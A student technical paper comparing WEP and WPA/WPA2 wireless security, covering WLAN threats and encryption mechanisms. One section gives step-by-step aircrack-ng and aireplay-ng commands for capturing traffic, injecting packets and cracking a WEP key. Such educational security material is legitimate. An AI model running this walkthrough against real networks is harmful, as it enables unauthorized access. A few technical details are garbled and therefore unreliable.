Sulabh Khanal (09289394) Wireless Security Technologies: WEP vs WPA/WPA2 Table of Contents ABSTRACT............................................................................................................................................ 2 INTRODUCTION TO WLAN ............................................................................................................... 3 WLAN COMPONENTS ........................................................................................................................ 4 Access Points ...................................................................................................................................... 4 Network Interface Cards (NICs)/client adapters ................................................................................. 4 Antennae ............................................................................................................................................. 4 SECURITY THREATS OF WLAN ....................................................................................................... 5 Spoofing and Session Hijacking ......................................................................................................... 5 Rogue Access Points ........................................................................................................................... 5 Denial of Service................................................................................................................................. 5 Eavesdropping..................................................................................................................................... 5 MAN-in-the-Middle Attack ................................................................................................................ 6 War Driving ........................................................................................................................................ 6 Wireless Network Sniffers .................................................................................................................. 6 WLAN SECURITY TECHNOLOGIES ................................................................................................. 7 Wired Equivalent Privacy (WEP) ....................................................................................................... 7 Working of WEP............................................................................................................................. 7 WEP vulnerabilities ........................................................................................................................ 8 Cracking WEP ................................................................................................................................ 9 Wi-Fi Protected Access (WPA/WPA2) ............................................................................................ 12 Basic working of WPA/WPA2 ..................................................................................................... 12 Working of WPA-TKIP ................................................................................................................ 13 Working of WPA2-AES ............................................................................................................... 14 WPA/WPA2 SECURITY ADVANTAGE OVER WEP ...................................................................... 15 CONCLUSION ..................................................................................................................................... 16 REFERENCES ..................................................................................................................................... 17 1 Sulabh Khanal (09289394) Wireless Security Technologies: WEP vs WPA/WPA2 ABSTRACT Wireless technology is becoming a part of daily life. Wireless routers are installed in nearly every house today. Most of these routers are in default configuration or in an out of the box state. Only some of them are using really strong encryption system in their wireless network. Due to this, there are cases of many un-authorized access to WLAN. Just using wireless encryption technologies is not enough, knowing which technology provides the best security solution is important so as to keep attackers from unauthorized access. This technical paper gives an overview of Wireless security threats and comparison of underlying wireless security technologies. 2 Sulabh Khanal (09289394) Wireless Security Technologies: WEP vs WPA/WPA2 INTRODUCTION TO WLAN A wireless local area network (WLAN) is a flexible data communications system that provides wireless network communication over short distances using radio or infrared signals. In 1997, the first WLAN i.e. IEEE 802.11, was implemented. WLAN has been widely used in many sectors ranging from corporate, education, finance, healthcare, retail, manufacturing, and warehousing. WLAN is easier to install in comparison to wired network which requires a lot of hassle during cabling. The following are the common IEEE 802.11 WLAN specifications: - IEEE 802.11: 802.11 operated in the 2.4 GHz range and was the original specification of the 802.11 IEEE standards. This specification delivered 1 to 2 Mbps using a technology known as phase-shift keying (PSK) modulation. This specification is no longer used and has largely been replaced by other forms of the 802.11 standard. - IEEE 802.11a: 802.11a operates in the 5 GHz band and has a maximum raw data rate of 54 Mbit/s. Since this standard utilizes a higher frequency band, the range of 802.11a is relatively low. The 802.11a utilizes OFDM (Orthogonal Frequency Division Multiplexing) technique. - IEEE 802.11b: 802.11b operates in the 2.4 GHz band and has a maximum raw data rate of 11 Mbit/s. This standard has an increase range in comparison to 802.11a since it operates in a lower frequency band. - IEEE 802.11g: 802.11g operates in the 2.4 GHz frequency band and utilizes OFDM technique and has a maximum raw data rate of 54 Mbit/s. This standard hardware is backward compatible with the 802.11b hardware. - IEEE 802.11n: 802.11n operates both in the 5 GHz or 2.4 GHz frequency band and has a maximum raw data rate of 600 Mbit/s which is a significant improvisation. It has a broader channel width of 40 MHz and utilizes MIMO (Multiple Input Multiple Output) and SDM(Spatial Division Multiplexing) techniques. 3 Sulabh Khanal (09289394) Wireless Security Technologies: WEP vs WPA/WPA2 WLAN COMPONENTS One important advantage of WLAN is the simplicity of its installation. Installing a wireless LAN system is easy and can eliminate the needs to pull cable through walls and ceilings. The physical architecture of WLAN is quite simple. Basic components of a WLAN are access points (APs) and Network Interface Cards (NICs)/client adapters. Access Points Access Point (AP) is essentially the wireless equivalent of a LAN hub. It is typically connected with the wired backbone through a standard Ethernet cable, and communicates with wireless devices by means of an antenna. An AP operates within a specific frequency spectrum and uses 802.11 standard specified modulation techniques. It also informs the wireless clients of its availability, and authenticates and associates wireless clients to the wireless network. Network Interface Cards (NICs)/client adapters Wireless client adapters connect PC or workstation to a wireless network either in ad hoc peer-to-peer mode or in infrastructure mode with APs. It is available in PCMCIA (Personal Computer Memory Card International Association) card and PCI (Peripheral Component Interconnect) and connects desktop and mobile computing devices wirelessly to all network resources. The NIC scans the available frequency spectrum for connectivity and associates it to an access point or another wireless client. The NIC enables users to be connected instantly to the network. Antennae The wireless transmission of data necessarily needs antennas both at sender and receiver for proper operation. The selection of appropriate antennas can impact the functionality of a WLAN dramatically. An antenna does not increase the power but focuses in a particular direction to increase reception. Proper installation of the antenna is crucial for a WLAN. 4 Sulabh Khanal (09289394) Wireless Security Technologies: WEP vs WPA/WPA2 SECURITY THREATS OF WLAN Despite the productivity, convenience and cost advantage that WLAN offers, the radio waves used in wireless networks create a risk where the network can be hacked. This section explains various threats such as Denial of Service, Spoofing, Eavesdropping, etc. Spoofing and Session Hijacking This is where the attacker could gain access to privileged data and resources in the network by faking the identity of a valid user. This happens because 802.11 networks do not authenticate the source address, which is the MAC (Medium Access Control) address of the frames. Attackers may therefore spoof MAC addresses and hijack active wireless sessions. Rogue Access Points Attackers may use rouge access points that has a similar SSID (Service Set Identifier) name to the actual AP. Users may accidentally or unknowingly connect to such rogue APs and their privacy might be compromised. In eliminating spoofing, proper authentication and access control mechanisms need to be placed in the WLAN. Denial of Service In this kind of attack, the intruder floods the network with either valid or invalid messages affecting the availability of the network resources. Due to the nature of the radio transmission, the WLAN are very vulnerable against denial of service attacks. The relatively low bit rates of WLAN can easily be overwhelmed and leave them open to denial of service attacks. By using a powerful enough transceiver, radio interference can easily be generated that would enable WLAN to communicate using radio path. Eavesdropping This involves attack against the confidentiality of the data that is being transmitted across the network. By their nature, wireless LANs intentionally radiates network traffic into space. This makes it impossible to control who can receive the signals in any wireless LAN installation. In the wireless network, eavesdropping by the third parties is the most significant threat because the attacker can intercept the transmission over the air from a distance, away from the premises. 5 Sulabh Khanal (09289394) Wireless Security Technologies: WEP vs WPA/WPA2 MAN-in-the-Middle Attack In impersonation or "man-in-the-middle" attacks, even when the data is sufficiently protected, devices can be impersonated. This can lead to service availability attacks or inadvertent data capture with the latter leading to the possibility of encryption cracking. War Driving War driving is an attack in which the attacker moves in a vehicle and probes for open wireless networks using a portable computer (laptops). Software such as Kismet, Kismac, Netstumbler, etc are readily available that are used by attackers to identify and gain unauthorized access to open wireless access. Wireless Network Sniffers Wireless Network Sniffers such as Ettercap, AirScanner, Wireshark, etc are used by attackers to find the location of access points. These sniffers not only detect access points but also capture and analyze packets travelling through the wireless network. Jamming Since wireless technology operates in the radio frequency spectrum, transmissions that overlap into the same frequency can cause interference. This intentional type of interference is called jamming. Jamming the wireless channel can force WLAN users to disconnect from access points. Attackers may use this type of technique to cause a sort of DoS by jamming the wireless channel. 6 Sulabh Khanal (09289394) Wireless Security Technologies: WEP vs WPA/WPA2 WLAN SECURITY TECHNOLOGIES Wired Equivalent Privacy (WEP) Wired Equivalent Privacy (WEP) is an IEEE 802.11 standard encryption for wireless networking. It is a user authentication and data encryption system used to overcome security threats. WEP provides security to WLAN by encrypting the information transmitted over the air, so that only the receivers who have the correct encryption key can decrypt the information. This encryption key also helps to authenticate authorised users and provide access to the wireless network. Working of WEP WEP uses a pre-established shared secret key called the base key, RC4 encryption algorithm and the CRC-32 (Cyclic Redundancy Code) checksum algorithm. WEP supports up to four different base keys, identified by Key IDs (0 to 3). Each of these keys is a group key called a default key and are shared among all the members in a specific wireless network. WEP operates on MAC Protocol Data Units (MPDUs). To protect the data in an MPDU, WEP first computes an integrity check value (ICV) over to the MPDU data and creates CRC-32 of the data. WEP adds the ICV to the data to ensure data integrity. WEP selects a base key and an initialization vector (IV), which is a 24-bit value. WEP constructs a per-packet RC4 key by concatenating the IV value and the selected shared base key using XOR function. Fig: Basic WEP Encryption WEP then uses the per-packet key to RC4, and encrypt both the data and the ICV. The IV and KeyID identifying the selected key are encoded as a four-byte string and pre-pended to the encrypted data. A basic WEP base key size is 40 bits, so the per-packet key consists of 64 bits once it is combined with the initialization vector (IV). In some cases the WEP base key size is 104 bits so the per-packet key consists of 128 bit. This increase in size does not make WEP any secure. 7 Sulabh Khanal (09289394) Wireless Security Technologies: WEP vs WPA/WPA2 WEP vulnerabilities WEP has the following vulnerabilities which makes it more susceptible to WLAN attacks: The initialization vector (IV) is too small WEP uses the Initialization Vector along with the WEP encryption key as input to the RC4 pseudo-random number generator (PRNG), which produces a key stream that is used to encrypt the 802.11 frame payload. With a 24-bit WEP Initialization Vector, it is easy to capture multiple WEP frames with the same IV value, making real-time decryption easier. Uses the master key rather than a derived key The WEP encryption key, either manually configured or determined through 802.1X authentication, is the only available keying material. Therefore, the WEP encryption key is the master key. Using the master key to encrypt data is less secure than using a key derived from the master key. Weak data integrity WEP data integrity consists of performing the Cyclic Redundancy Check-32 (CRC-32) checksum calculation on the bytes in the unencrypted 802.11 payload and then encrypting its value with WEP. Even encrypted, it is relatively easy to change bits in the encrypted payload and then properly update the encrypted CRC-32 result, preventing the receiver from finding out that the data frames have changed. No replay protection WEP does not provide any protection against replay attacks, in which an attacker sends a series of previously captured frames in an attempt to gain access or modify data. No rekeying WEP does not provide for a method to refresh the encryption keys. 8 Sulabh Khanal (09289394) Wireless Security Technologies: WEP vs WPA/WPA2 Cracking WEP By taking advantages of the above weaknesses of WEP, attackers have found numerous ways to gain access. Now-a-days, there are numerous tools to decrypt and crack WEP security. WEP cracking utilities such as Aircrack-ng and AirSnort make it very easy to crack WEP encrypted keys. WEP can be cracked very easily by using Backtrack Linux 3 or higher that utilizes Aircrack-ng. All that is needed is a BackTrack Linux Distribution ready computer with wireless adaptor capable of packet injection and wireless monitoring. The following steps and commands will show how simply a WEP can be cracked. - First of all, boot BackTrack Linux and open a Konsole (terminal). - On the terminal type ‘airmon-ng’ to determine the wireless interface. - Type ‘airodump-ng wlan0’ to scan the wireless networks where ‘wlan0’ is the wireless interface name. - There are a few wireless networks as shown above. Select a WEP wireless network to crack and note the BSSID, Channel number and the ESSID. 9 Sulabh Khanal (09289394) - Wireless Security Technologies: WEP vs WPA/WPA2 Type ‘airodump-ng –w wep –c 11 –bssid 00:90:D0:EF:B4:10 wlan0’ to start collecting WEP packets. Here ‘–w wep’ specifies that the WEP packets to be dumped in file called ‘wep’, ‘–C 11’ specifies the channel number of the wireless AP, ‘-bssid 00:90:D0:EF:B4:10’ specifies the MAC/bssid address of the wireless AP and ‘wlan0’ specifies the wireless interface to collect WEP packets. The following screen appears showing that the WEP data packets are being collected. - To speed up the process of collecting data, open another terminal and type ‘aireplayng –1 0 –a 00:90:D0:EF:B4:10 wlan0’ to send authentication and association request to the wireless AP. Here, ‘-1’ specifies the type of attack, ‘0’ specifies the delay between attacks, ‘-a 00:90:D0:EF:B4:10’ specifies the MAC/bssid of the wireless AP and ‘wlan0’ specifies the wireless interface. - Now the packets have to be injected. Type ‘aireplay-ng -3 –b 00:90:D0:EF:B4:10 wlan0’. Here, ‘-3’ specifies the type of attack (packet injection in this case), ‘-b 00:90:D0:EF:B4:10’ specifies the MAC/bssid of the AP and ‘wlan0’ specifies the wireless interface 10 Sulabh Khanal (09289394) - Wireless Security Technologies: WEP vs WPA/WPA2 After enough packets have been captured and injected, open another terminal and type ‘aircrack-ng wep-01.cap’ to start cracking the WEP password. Here, ‘wep-01.cap’ is the injected dump file. After a while the password is decrypted which in this case is ’0561931820’. 11 Sulabh Khanal (09289394) Wireless Security Technologies: WEP vs WPA/WPA2 Wi-Fi Protected Access (WPA/WPA2) WPA is a wireless authentication technology that replaces WEP with a strong new encryption technology called Temporal Key Integrity Protocol (TKIP) with Message Integrity Check (MIC).It facilitates the user by providing mutual authentication using either Extensible Authentication Protocol (EAP) or pre-shared key (PSK) technology. WPA2 is the certified interoperable version of the full IEEE 802.11i specification launched in September 2004 by the Wi-Fi Alliance. Like WPA, WPA2 supports IEEE 802.1X/EAP authentication or PSK technology. It also includes a new advanced encryption mechanism using the Counter-Mode/CBC-MAC Protocol (CCMP) called the Advanced Encryption Standard (AES). Basic working of WPA/WPA2 WPA and WPA2 authentication is initiated when a user associates with an access point. The AP blocks access to the network until the user can be authenticated. The user provides credentials which are communicated to the authentication server. The authentication process is enabled by the IEEE 802.1X/EAP framework. With EAP, IEEE 802.1X creates a framework in which client workstations and the authentication server mutually authenticate with one another via the AP. Mutual authentication helps to ensure that only authorized users access the network and confirms that the client is authenticating to an authorized server and not an unauthorized rogue AP. If the authentication server accepts the user’s credentials, the client joins the WLAN. If not, the client remains blocked. Once the user has been authenticated, the authentication server and the client simultaneously generate a Pairwise Master Key (PMK). A 4-way handshake then takes place between the client and the AP, to complete the process of authenticating the AP with the client, establishing and installing the TKIP/WPA or AES/WPA2 encryption keys. As the client begins communicating on the LAN, encryption protects the data exchanged between the client and the AP. 12 Sulabh Khanal (09289394) Wireless Security Technologies: WEP vs WPA/WPA2 Working of WPA-TKIP WPA addresses the weaknesses of WEP with the strong dynamic encryption provided by TKIP. TKIP encryption replaces WEP’s small (40-bit) static encryption key, manually entered on wireless APs and client devices, with a 128 bit per-packet key. WPA uses a methodology that dynamically generates keys and removes the predictability that intruders rely upon to exploit the WEP key. WPA also includes a Message Integrity Check (MIC), designed to prevent an attacker from capturing, altering and resending data packets. WPA operates at the Media Access Control (MAC) layer. In this process, after accepting a user’s credentials, the authentication server uses 802.1X to produce a unique master, or ‘pair-wise’, key for that user session. TKIP distributes the key to the client and AP, setting up a key hierarchy and management system. TKIP dynamically generates unique keys to encrypt every data packet that is wirelessly communicated during a session. This hierarchy replaces WEP’s single static key with some 280 trillion possible keys that can be generated for a given data packet. The MIC is employed to prevent an attacker from capturing, altering and resending data packets. The MIC provides a strong mathematical function in which the receiver and the transmitter each compute and then compare the MIC. If it does not match, the data is assumed to have been tampered with and the packet is dropped unless the optional MIC countermeasure is implemented in which case all clients are de-authenticated and new associations are prevented for a minute. If more than two MIC failures are observed in a 60 second window, both the Access Point (AP) and client station shut down for 60 seconds. In this case, TKIP is vulnerable. The new TKIP attack uses a mechanism similar to the WEP attack to decode one byte at a time by using multiple replays and observing the response over the air. When a MIC failure occurs, the attacker can observe the response and waits for 60 seconds to avoid MIC countermeasures. Using the mechanism, the attacker can decode a packet at the rate of one byte per minute. Small packets like ARP (Address Resolution Protocol) frames can typically be decoded in about 15 minutes by leveraging this exploit. Once a TKIP frame has been captured and decoded, the attacker can use the obtained key sequence to further inject up to 15 additional arbitrary frames using different QoS queues without triggering a sequence number violation that would have lead to the injected packet being dropped. This can lead to problems such as ARP decoding following by ARP poisoning, DNS manipulation and DoS attacks. However, it is still difficult to crack WPA/TKIP since it takes a lot of time and the wireless network has to be a busy one. 13 Sulabh Khanal (09289394) Wireless Security Technologies: WEP vs WPA/WPA2 Working of WPA2-AES AES is a block cipher, a type of symmetric key cipher that uses groups of bits of a fixed length called blocks. A symmetric key cipher is a cipher that uses the same key for both encryption and decryption. The word cipher is used in cryptography to describe the instructions or algorithm used for encrypting and decrypting information. With AES, bits are encrypted in blocks of plaintext that are calculated independently, rather than a key stream acting across a plaintext data input stream. AES has a block size of 128 bits with 3 possible key lengths 128, 192 and 256 bits as specified in the AES standard. For the WPA2/802.11i implementation of AES, a 128 bit key length is used. AES encryption includes 4 stages that make up one round. Each round is then iterated 10, 12 or 14 times depending upon the bit-key size. For the WPA2/802.11i implementation of AES, each round is repeated 10 times. AES uses the Counter-Mode/CBC-Mac Protocol (CCMP). CCM is a new mode of operation for a block cipher that enables a single key to be used for both encryption and authentication. The 2 underlying modes employed in CCM include Counter mode (CTR) that achieves data encryption and Cipher Block Chaining Message Authentication Code (CBC-MAC) to provide data integrity. CBC-MAC is used to generate an authentication component as a result of the encryption process. This is different from prior MIC implementations, in which a separate algorithm for integrity check is required. To further enhance its advanced encryption capabilities, AES uses a 48-bit Initialization Vector (IV). AES has no known attacks and the current analysis indicates that it takes 2120 operations to break an AES key making it an extremely secure cryptographic algorithm. WPA2, however, can only be used in newer hardware. Older hardware do not support WPA2 and therefore need to be replaced by newer ones. 14 Sulabh Khanal (09289394) Wireless Security Technologies: WEP vs WPA/WPA2 WPA/WPA2 SECURITY ADVANTAGE OVER WEP When compared with the IEEE 802.11 security standard using 40-bit WEP with no dynamic keying, TKIP and AES make it far more difficult-if not impossible-for a would-be intruder to break into a Wi-Fi network. By greatly expanding the size of keys and number of keys in use, creating an integrity checking mechanism, using a strong encryption cipher; and imposing replay protection, AES and TKIP greatly increase the strength and complexity of wireless encryption. Together with the IEEE 802.1X/EAP mutual authentication framework, TKIP and AES amplify the complexity and difficulty involved in decoding data on a Wi-Fi network making the Wi-Fi network secure than ever. WPA/WPA2 have the following advantages over WEP: - IV length has increased to 48 bits from 24 bits, which allows WPA to achieve over 500 trillion possible key combinations. - IVs are now better protected through the use of the TSC, or TKIP sequence counter, helping to prevent the re-use of IV keys. - WPA2 uses AES (Advanced Encryption Standard) to provide stronger encryption. - Every packet sent over the air is encrypted with a unique key and avoids re-use. - Master keys are never directly used - WPA2 requires authentication in two phases; the first is an open system authentication and the second uses 802.1X and an Extensible Authentication Protocol (EAP) authentication method. For infrastructure such as small office/home office (SOHO) networks without a Remote Authentication Dial-In User Service (RADIUS) server, WPA2 Personal supports the use of a preshared key (PSK). - WPA/WPA2 rekeys automatically to derive new sets of temporal keys. The above advantages of WPA/WPA2 over WEP certainly discourage everyone to use WEP as security solution to wireless LAN. 15 Sulabh Khanal (09289394) Wireless Security Technologies: WEP vs WPA/WPA2 CONCLUSION In the overall report WLAN vulnerability has been discussed and a comparative study of Wireless security technologies has been done. To maintain Confidentiality, integrity and privacy more secure and stronger security technology has to be used. Wired Equivalent Privacy (WEP) is the least secure algorithm that has many vulnerabilities and may pose a risk to wireless network if implemented. With their advantageous encryption mechanisms, secure authentication mechanism and robust key management, WPA/WPA2 can be considered the most secure wireless technologies till date. However, each of these technologies has their own advantages and disadvantages in terms of implementations. The more advanced the technology the more secure it becomes but complexity in deployment also increases. Not only implementing secure wireless technologies but some simple methods such as turning off the SSID broadcasting, using static IP addresses, use of firewalls, implementing VPN (Virtual Private Network) and minimizing radio wave propagation in non-user areas by aligning the antennae of the AP properly can also greatly improve WLAN security. The security measures for wireless security attack prevention have certainly improved over the past several years, but the struggle to maintain this position must continue to move forward. The comparisons of WEP and WPA/WPA2 definitely show that the technology is moving in the right direction, but it should never stay stagnant for long. Wireless transmissions will not come to an end in the near future, in fact, the technology will be enhanced. The solution is to stay ahead of technology, ward off unruly attackers and provide a secure environment for data transmission. 16 Sulabh Khanal (09289394) Wireless Security Technologies: WEP vs WPA/WPA2 REFERENCES 1. Symantec (2002). Wireless LAN Security: Enabling and Protecting the Enterprise [online]. Available from: http://www.symantec.com/avcenter/reference/symantec.wlan.security.pdf [Accessed: 20th January 2010] 2. Wi-Fi Alliance (2003). Wi-Fi Protected Access: Strong, standards-based, interoperable security for Wi-Fi networks [online]. Available from: http://www.trentu.ca/admin/it/airtrent/WPA .pdf [Accessed: 5th February 2010] 3. Internet Security Systems (2001). Wireless LAN Security: 802.11b and Corporate Networks [online]. Available from: http://documents.iss.net/whitepapers/wireless_LAN_security.pdf [Accessed: 9th February 2010] 4. Wikipedia Reference (2009).Wireless LAN Security [online]. Available from: http://en.wikipedia.org/wiki/Wireless_LAN_security [Accessed: 10th February 2010] 5. Wikipedia Reference (2010). WiFi Protected Access [online]. Available from: http://en.wikipedia.org/wiki/Wi-Fi_Protected_Access [Accessed: 9th February 2010] 6. Backtrack Linux (2010). Index Page [online]. Available from: http://www.backtracklinux.org/ [Accessed: 5th February 2010] 7. Ou, G. (2005). Understanding the updated WPA and WPA2 standards [online]. Available from: http://blogs.zdnet.com/Ou/?p=67 [Accessed: 5th February 2010] 8. Dlaverty (2009). WPA vs WEP: How your Choice Affects your Wireless Network Security [online]. Available from: http://www.openxtra.co.uk/articles/wpa-vs-wep [Accessed: 5th February 2010] 9. Aircrack-ng (2009). Tutorials [online]. Available from: http://www.aircrackng.org/doku.php?id=tutorial [Accessed: 8th February 2010] 17